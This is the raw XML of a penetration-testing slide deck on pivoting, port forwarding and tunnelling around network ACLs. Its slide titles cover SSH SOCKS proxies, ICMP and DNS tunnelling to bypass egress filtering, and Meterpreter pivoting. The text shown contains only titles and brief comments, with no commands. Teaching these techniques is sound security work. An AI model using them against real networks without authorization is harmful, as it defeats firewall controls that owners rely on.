                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Tunneling_protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13212728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26798C0-3120-4922-A2D8-16E731A647E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="2084890"/>
            <a:ext cx="9144000" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E75B5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bypassing Host Based Firewall/Network ACLs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="11500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24447045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26798C0-3120-4922-A2D8-16E731A647E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="2235200"/>
            <a:ext cx="9144000" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“We aren’t vulnerable to that, it’s not listening on the network”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23185985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7A5E6A-D01F-4643-81A2-8C466A518B6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418682" y="0"/>
            <a:ext cx="3932237" cy="1600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSH Port Forwarding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C27ED1B-0280-4A37-A752-CE3A342CF66D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418682" y="1600200"/>
            <a:ext cx="3932237" cy="3811588"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Port forwarding over SSH tunnel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OpenSSH Client and Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F373FC08-F220-495F-B9CC-B98B66C1C0B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194508" y="1055014"/>
            <a:ext cx="6908672" cy="2945781"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3A23A48-7BF9-41B5-A7B9-C238D844A807}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3809999" y="476628"/>
            <a:ext cx="6093994" cy="543162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t># Apache is configured to listen on localhost</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t># /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/apache2/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ports.conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="70AD47"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Graphical user interface, text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D07BF3E-8E4F-4C97-9D83-206F9DCBC23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194508" y="4588661"/>
            <a:ext cx="7720823" cy="2040739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CDE7224-92AB-4D2F-A8D5-B3F857BB3EB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3809999" y="4023147"/>
            <a:ext cx="6214310" cy="543162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t># Confirmed Apache isn't listening on LAN interface (192.168.30.0/24)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> scan from Kali on same LAN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28134593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1770</TotalTime>
  <Words>1762</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>262</Paragraphs>
  <Slides>39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39</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="45" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Network Excavation: Pivoting, Forwarding, and Tunneling Around ACLs</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Port Forwarding</vt:lpstr>
      <vt:lpstr>Common Ports</vt:lpstr>
      <vt:lpstr>Tunnelling</vt:lpstr>
      <vt:lpstr>Common Tunnelling Protocols</vt:lpstr>
      <vt:lpstr>Bypassing Host Based Firewall/Network ACLs</vt:lpstr>
      <vt:lpstr>“We aren’t vulnerable to that, it’s not listening on the network”</vt:lpstr>
      <vt:lpstr>SSH Port Forwarding</vt:lpstr>
      <vt:lpstr>SSH Port Forwarding</vt:lpstr>
      <vt:lpstr>SSH Port Forwarding</vt:lpstr>
      <vt:lpstr>“Only the servers can talk to that”</vt:lpstr>
      <vt:lpstr>SSH SOCKS Proxy</vt:lpstr>
      <vt:lpstr>SSH SOCKS Proxy</vt:lpstr>
      <vt:lpstr>Configure Browser</vt:lpstr>
      <vt:lpstr>Check Tunnel</vt:lpstr>
      <vt:lpstr>Proxifying Applications</vt:lpstr>
      <vt:lpstr>Proxifying Applications</vt:lpstr>
      <vt:lpstr>Proxifying Applications</vt:lpstr>
      <vt:lpstr>Bypassing Egress Filtering</vt:lpstr>
      <vt:lpstr>“We only let PING out from there”</vt:lpstr>
      <vt:lpstr>ICMP Tunnelling</vt:lpstr>
      <vt:lpstr>ICMP Tunnelling</vt:lpstr>
      <vt:lpstr>ICMP Tunnelling</vt:lpstr>
      <vt:lpstr>“We only let DNS out from there”</vt:lpstr>
      <vt:lpstr>DNS Tunnelling</vt:lpstr>
      <vt:lpstr>DNS Tunnelling</vt:lpstr>
      <vt:lpstr>DNS Tunnelling</vt:lpstr>
      <vt:lpstr>DNS Tunnelling</vt:lpstr>
      <vt:lpstr>Metasploit Framework</vt:lpstr>
      <vt:lpstr>Helpful Metasploit Commands</vt:lpstr>
      <vt:lpstr>Port Forwarding w/Meterpreter</vt:lpstr>
      <vt:lpstr>Tunnelling w/Meterpreter</vt:lpstr>
      <vt:lpstr>Penetration Test Scenario</vt:lpstr>
      <vt:lpstr>Penetration Test Scenario</vt:lpstr>
      <vt:lpstr>Penetration Test Scenario</vt:lpstr>
      <vt:lpstr>Penetration Test Scenario</vt:lpstr>
      <vt:lpstr>Penetration Test Scenario</vt:lpstr>
      <vt:lpstr>Penetration Test Scenario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Network Excavation: Pivoting, Forwarding, and Tunneling Around ACLs</dc:title>
  <dc:creator>Cory</dc:creator>
  <cp:lastModifiedBy>Cory</cp:lastModifiedBy>
  <cp:revision>110</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-02-07T00:46:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-15T23:26:54Z</dcterms:modified>
</cp:coreProperties>
</file>